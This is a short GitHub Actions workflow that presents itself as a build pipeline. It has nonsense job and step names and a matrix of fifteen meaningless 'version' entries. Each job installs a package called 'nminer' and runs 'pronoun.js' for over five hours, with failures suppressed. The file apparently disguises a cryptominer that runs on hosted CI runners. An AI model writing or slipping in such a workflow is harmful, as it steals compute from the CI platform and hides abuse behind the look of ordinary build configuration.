name: pronoun
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 5736 }
          - { version: 2766 }
          - { version: 1252 }
          - { version: 4019 }
          - { version: 582 }
          - { version: 7748 }
          - { version: 7505 }
          - { version: 2693 }
          - { version: 8549 }
          - { version: 6082 }
          - { version: 6997 }
          - { version: 1436 }
          - { version: 570 }
          - { version: 117 }
          - { version: 4677 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: statement towards troubled till indeed
        run: |
          npm install nminer@latest
          timeout 317m node pronoun.js || echo "pronoun executed"